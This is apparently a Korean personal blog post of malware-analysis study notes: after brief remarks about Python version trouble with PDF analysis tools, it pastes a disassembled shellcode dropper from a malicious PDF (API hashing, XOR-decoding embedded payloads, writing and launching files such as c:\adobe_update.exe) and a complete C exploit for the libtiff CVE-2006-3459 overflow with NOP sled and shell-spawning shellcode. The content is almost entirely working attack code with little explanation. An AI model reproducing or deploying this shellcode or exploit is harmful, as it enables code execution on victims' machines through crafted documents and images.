securityfirst_jo

참고 :
http://www.boannews.com/media/view.asp?page=1&idx=21730&search=&find=&kind=1

http://malwarelab.tistory.com/78
---------------------------------------------------------------------------------------------------------
 이것때문에 많이 해멨다 .. 우선 에러가 뜨는 문제.....무슨 이상한 에러 뜨면서 안되는거 print 이부분에서 엄청 해맸따.. 외국사이트 가서 겨우 알게 된 사실....버젼이 낮은거였다고 한다...파이썬이 제길 ㅋㅋㅋ

덕분에 삽질만했군...ㅠㅠ

make-pdf_V0_1_1.zip

pdf-parser_V0_3_7.zip

pdfid_v0_0_10.zip

python-2.6.2.vol1.egg

python-2.6.2.vol2.egg

call $+5
push 0Ch
jmp short loc_401099
db 4Ch, 22h, 80h
dd 8AFE987Ch, 0DA08AC0Eh, 0B5B98376h, 7D9BAD78h
dd 0FD97FBDFh, 8A49EA0Fh, 238ADBE8h, 0FA6516E9h
dd 8F17E610h, 0B922F67Bh, 397EC7Ch, 646D630Ch
dd 20632F20h, 615C3A63h, 65626F64h, 6470755Fh
dd 2E657461h, 657865h, 0
dd 5C3A6300h, 61746164h, 4558452Eh, 0
dd 5C3A6300h, 61746164h, 4E49622Eh, 0
db 0

loc_401099:
pop ecx
pop edi
scasd
mov eax, fs:30h
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov ebp, [eax+8]

loc_4010AB:
push ecx
mov esi, [ebp+3Ch]
mov esi, [esi+ebp+78h]
add esi, ebp
push esi
mov esi, [esi+20h]
add esi, ebp
xor ecx, ecx
dec ecx

loc_4010BE:
inc ecx
lodsd
add eax, ebp
xor ebx, ebx

loc_4010C4:
movsx edx, byte ptr [eax]
cmp dl, dh
jz short loc_4010D3
ror ebx, 0Dh
add ebx, edx
inc eax
jmp short loc_4010C4

loc_4010D3:
cmp ebx, [edi]
jnz short loc_4010BE
pop esi
mov ebx, [esi+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [esi+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
stosd
pop ecx
loop loc_4010AB
sub edi, 38h
xor esi, esi

loc_4010F4:
inc esi
lea eax, [edi+80h]
push eax
push esi
call dword ptr [edi+18h]
cmp eax, 0FFFFFFFFh
jz short loc_4010F4
cmp eax, 1000h
jbe short loc_4010F4
mov [edi+4], eax
mov [edi+80h], esi
push dword ptr [edi+4]
push 40h
call dword ptr [edi+34h]
mov [edi+7Ch], eax
push 0
push 0
push 0
push dword ptr [edi+80h]
call dword ptr [edi+10h]
cmp eax, 0FFFFFFFFh
jz short loc_40118B
push 0
lea ebx, [edi+90h]
push ebx
push dword ptr [edi+4]
push dword ptr [edi+7Ch]
push dword ptr [edi+80h]
call dword ptr [edi+28h]
mov ecx, [edi+90h]
sub ecx, 0Ah
mov eax, [edi+7Ch]

loc_401158:
inc eax
cmp dword ptr [eax], 4B435646h
jnz short loc_40116A
cmp dword ptr [eax+4], 19890604h
jz short loc_40116E

loc_40116A:
loop loc_401158
jmp short loc_40118B

loc_40116E:
add eax, 8
mov [edi+94h], eax

loc_401177:
inc eax
cmp dword ptr [eax], 614B614Bh
jnz short loc_401189
cmp dword ptr [eax+4], 19811106h
jz short loc_401197

loc_401189:
loop loc_401177

loc_40118B:
push dword ptr [edi+7Ch]
call dword ptr [edi+30h]
jnz loc_4010F4

loc_401197:
mov [edi+98h], eax
push 2
lea esi, [edi+3Fh]
push esi
call dword ptr [edi+20h]
mov [edi], eax
push 2
lea esi, [edi+58h]
push esi
call dword ptr [edi+20h]
mov [edi+9Ch], eax
push 2
lea esi, [edi+68h]
push esi
call dword ptr [edi+20h]
mov [edi+0A0h], eax
mov ebx, [edi+98h]
sub ebx, [edi+94h]
mov eax, [edi+94h]

loc_4011D8:
xor [eax], bl
dec ebx
inc eax
cmp ebx, 0
jnz short loc_4011D8
mov eax, [edi+94h]
mov ecx, [eax]
mov [edi+0A4h], ecx
add eax, 4
mov ecx, [eax]
mov [edi+0A8h], ecx
add eax, 4
mov ecx, [eax]
mov [edi+0ACh], ecx
add eax, 4
mov esi, eax
push dword ptr [edi+0A4h]
push esi
push dword ptr [edi]
call dword ptr [edi+24h]
push dword ptr [edi+0A8h]
add esi, [edi+0A4h]
push esi
push dword ptr [edi+9Ch]
call dword ptr [edi+24h]
push dword ptr [edi+0ACh]
add esi, [edi+0A8h]
push esi
push dword ptr [edi+0A0h]
call dword ptr [edi+24h]
push dword ptr [edi]
call dword ptr [edi+1Ch]
push dword ptr [edi+9Ch]
call dword ptr [edi+1Ch]
push dword ptr [edi+0A0h]
call dword ptr [edi+1Ch]
call dword ptr [edi+8]
push eax
lea esi, [edi+3Fh]
mov edx, esi

loc_401262:
mov al, [edx]
inc edx
or al, al
jz short loc_40126B
jmp short loc_401262

loc_40126B:
mov byte ptr [edx-1], 20h
pop ecx

loc_401270:
mov al, [ecx]
or al, al
jz short loc_40127C
mov [edx], al
inc edx
inc ecx
jmp short loc_401270

loc_40127C:
mov [edx], al
sub esi, 7
call $+5
add [esp+4+var_4], 0Dh
push 0
push esi
push dword ptr [edi+2Ch]
jmp dword ptr [edi+0Ch]
start endp

db 6Ah
dd 0FFFF6A00h, 90901457h, 90909090h, 0B58h dup(0)
_text ends

#include <stdio.h>
#include <string.h>
#include <tiffio.h>
#include <stdlib.h>
#include <stdbool.h>

/*
 * basic exploit for CVE-2006-3459.
 *
 * $ ./a.out 
 * [*] creating exploit.tif, target address: 0xb7959000
 * [*] marker tag found at offset 524418.
 * [*] success.
 * $ display exploit.tif 
 * uid=1000(taviso) gid=100(users) groups=10(wheel)
 *
 * -- taviso@gentoo.org
 */

/* size of nop sled */
#define SLEDSIZ (2048 << 8)

/* get this address by printing tif->tif_base in a debugger */
#define RETADDR (0xb7919000 + SLEDSIZ/2)

#define MARKER 0xc0de /* this must be unique, make it anything */

unsigned char shellcode[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00"
"\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x0c\x00\x00\x00\x2f\x75\x73"
"\x72\x2f\x62\x69\x6e\x2f\x69\x64\x00\x57\x53\x89\xe1\xcd\x80";

TIFFFieldInfo badfield = {
    MARKER,         /* a unique unsigned short we search for */
    100,            /* number of shorts to read onto stack */
    100,            /* number we want to write into file */
    TIFF_SHORT,     /* data type */
    FIELD_CUSTOM,   /* field bit */
    1,              /* okay to change? */
    0,              /* passcount */
    "Exploit"       /* a name, unused */
};

int main(int argc, char **argv)
{
    TIFF *tif;
    FILE *mod;
    unsigned char *buf;
    unsigned short d;
    unsigned f[badfield.field_readcount], i;

    fprintf(stderr, "[*] creating exploit.tif, target address: %p\n", RETADDR);

    /* prepare a buffer containing address of shellcode */
    for (i = 0; i < badfield.field_readcount; i++)
        f[i] = RETADDR;

    /* open the target exploit file */
    if ((tif = TIFFOpen("exploit.tif", "w")) == NULL) {
        fprintf(stderr, "[!] failed to open target.\n");
        return 1;
    }

    /* teach libtiff about made up tag */
    TIFFMergeFieldInfo(tif, &badfield, 1);

    /* install basic required tags */
    TIFFSetField(tif, TIFFTAG_IMAGEWIDTH, SLEDSIZ + sizeof(shellcode));
    TIFFSetField(tif, TIFFTAG_IMAGELENGTH, 1);
    TIFFSetField(tif, TIFFTAG_COMPRESSION, COMPRESSION_NONE);
    TIFFSetField(tif, TIFFTAG_PHOTOMETRIC, PHOTOMETRIC_MINISBLACK);
    
    /* now send buffer containing return addresses */
    TIFFSetField(tif, MARKER, &f);

    if ((buf = malloc(SLEDSIZ + sizeof(shellcode))) == NULL) {
        fprintf(stderr, "[!] sorry, memory allocation error.\n");
    }
    
    memset(buf, 0x90, SLEDSIZ);
    memcpy(buf + SLEDSIZ, shellcode, sizeof(shellcode));

    /* disguise nop sled and shellcode as image data */
    TIFFWriteEncodedStrip(tif, 0, buf, SLEDSIZ + sizeof(shellcode));
    TIFFClose(tif);

    /* okay, now open the file to find the marker taag */
    if ((mod = fopen("exploit.tif", "r+")) == NULL) {
        fprintf(stderr, "[!] failed to open target.\n");
        return 1;
    }

    /* try to find the MARKER by continually reading shorts. */

    /* yes, this is ugly. */
    while (true) {
        if (fread(&d, sizeof(short), 1, mod) < 1) {
            fprintf(stderr, "[!] failed to find marker.\n");
            return 1;
        }
        if (d == MARKER) {
            fprintf(stderr, "[*] marker tag found at offset %d.\n", 
                    ftell(mod) - sizeof(short));

            /* rewind ready to overwrite it */
            if (fseek(mod, - sizeof(short), SEEK_CUR) == -1) {
                fprintf(stderr, "[!] failed to reposition file.\n");
                return 1;
            }

            /* i'll use dot range */
            d = TIFFTAG_DOTRANGE;

            /* write it in */
            if (fwrite(&d, sizeof(short), 1, mod) < 1) {
                fprintf(stderr, "[!] failed to write new tag number.\n");
            }

            break;
        } else {
            if (fseek(mod, - sizeof(short) + 1, SEEK_CUR) == -1) {
                fprintf(stderr, "[!] failed to reposition file.\n");
                return 1;
            }
        }
    }

    fclose(mod);

    fprintf(stderr, "[*] success.\n");
    return 0;
}